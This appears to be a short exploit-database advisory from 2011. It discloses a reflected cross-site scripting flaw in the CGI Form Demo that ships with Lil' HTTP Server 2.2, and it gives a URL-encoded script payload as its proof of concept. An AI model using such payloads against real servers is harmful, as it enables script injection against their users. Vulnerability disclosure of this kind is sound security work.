Lil' HTTP Server 2.2 Cross Site Scripting



EKU-ID: 358 CVE: OSVDB-ID:
Author: expku Published: 2011-05-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Lil' HTTP Server v2.2 Default  CGI From Xss Vulnerability

Discription : 
In Lil' HTTP server 2.2v come with some Default applications 
in "CGI Form Demo" Applicatio they alows you to submit your name and e-mail . there is a XSS vuln in submit application

Sample : 
http://192.168.1.102/pbcgi.cgi?name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E

Reffernce :

- http://treasuresec.com [Treasure's Security Blog]
- http://www.summitcn.com/lilhttp/lildocs.html
- http://en.wikipedia.org/wiki/Cross-site_scripting